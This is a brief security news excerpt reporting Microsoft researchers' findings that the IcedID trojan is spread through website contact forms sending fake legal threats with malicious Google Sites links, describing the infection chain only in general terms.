Security News > 2021 > April > IcedID Circulates Via Web Forms, Google URLs
Website contact forms and Google URLs are being used to spread the IcedID trojan, according to researchers at Microsoft.
Attackers are using "Contact us" forms on websites to send emails targeting organizations with trumped-up legal threats, researchers said.
JS file is executed via WScript, and that it creates a shell object that in turn launches PowerShell and downloads the IcedID payload in the form of a.DAT file.
"Further analysis reveals that the forms contain malicious sites.google.com links that download the IcedID malware."
The use of contact forms on websites allow the campaign to get around email spam filters, researchers noted - and adds a layer of verisimilitude for recipients.
"The scenarios we observed offer a serious glimpse into how sophisticated attackers' techniques have grown, while maintaining the goal of delivering dangerous malware payloads such as IcedID. Their use of submission forms is notable because the emails don't have the typical marks of malicious messages and are seemingly legitimate."